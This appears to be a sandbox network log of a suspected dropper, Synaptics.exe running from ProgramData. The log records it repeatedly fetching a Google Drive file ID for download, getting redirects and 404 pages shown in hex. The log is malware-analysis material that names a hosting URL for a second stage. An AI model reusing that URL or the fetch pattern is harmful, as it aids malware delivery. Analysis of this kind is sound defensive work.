                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-iKwOrE6BZhc31M9aC1QjVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            102192.168.2.950143172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:10 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:10 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:10 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Rex1ZcvY-259tzPfCGiZlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            103192.168.2.950144216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:10 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4dyq9hPdSeWPthq8c3kwqvA1LoQkljYy2lhY3QjAN5KvpdK0aB0TwZE0a51As6gQv1
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Fur3sQMLSZAZiyBftdHbvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:11 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:11 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 53 61 63 6b 68 4f 4d 58 39 4b 74 66 6f 7a 65 69 77 51 75 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="YSackhOMX9KtfozeiwQuNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            104192.168.2.950145172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:10 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-mMZLuNZAQr1gWjiuUPFSsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            105192.168.2.950148172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:11 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5DP-h0Yf2mGYynzUaMQ_yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            106192.168.2.950147216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:11 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:11 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7uufi-CuuSG2IT7wLak9LKJJWmSm-91fpdC4KXJFw3XMayJ_ox2MWl7zYcZNyeiWNyVZkJtO8
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:11 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9zZK_44E4xkYScADtjQXmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:11 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:11 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 6b 75 6f 57 35 61 48 34 42 65 63 74 56 5a 46 6a 77 6e 79 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="bkuoW5aH4BectVZFjwny4A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:11 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            107192.168.2.950150172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:12 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-637N9sa6WGT9b6JCAiR_kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            108192.168.2.950149216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC64Xg5NVph1lDOLsZ_pznUCyOciwqzYz2Tlr_vK5SYko2JDgdeQbB83grcTehrQU-tfiYBEsus
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:12 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5zp8a64Bmyh5nnK7psQqdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 59 6a 67 67 42 6a 7a 35 67 33 62 45 6f 73 44 7a 49 34 48 56 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="nYjggBjz5g3bEosDzI4HVQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            109192.168.2.950154216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
